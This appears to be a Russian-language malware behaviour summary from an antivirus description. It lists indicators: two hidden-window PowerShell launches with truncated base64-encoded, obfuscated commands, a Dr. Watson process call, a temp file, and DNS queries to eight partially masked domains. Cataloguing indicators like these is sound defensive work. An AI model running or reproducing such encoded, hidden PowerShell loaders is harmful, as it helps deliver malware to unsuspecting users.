Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBlAFQALQBpAHQAZQBNACAAdgBBAFIASQBhAEIATABlADoAbgBpADcAOABFACAAKAAgAFsAdAB5AFAAZQBdACgAIgB7ADMAfQB7ADUAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQAiAC0AZgAnAFMAdABFAE0ALgBpACcALA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1164360.cvr
- DNS ASK dr####asreedhar.com
- DNS ASK 4g###dloom.com
- DNS ASK bu####sgateway.com
- DNS ASK pi####delcielo.com
- DNS ASK kv##edu.org
- DNS ASK to###ami.com
- DNS ASK hu####atviet.com
- DNS ASK wh####oors.co.uk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBlAFQALQBpAHQAZQBNACAAdgBBAFIASQBhAEIATABlADoAbgBpADcAOABFACAAKAAgAFsAdAB5AFAAZQBdACgAIgB7ADMAfQB7ADUAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQAiAC0AZgAnAFMAdABFAE0ALgBpACcALA...' (со скрытым окном)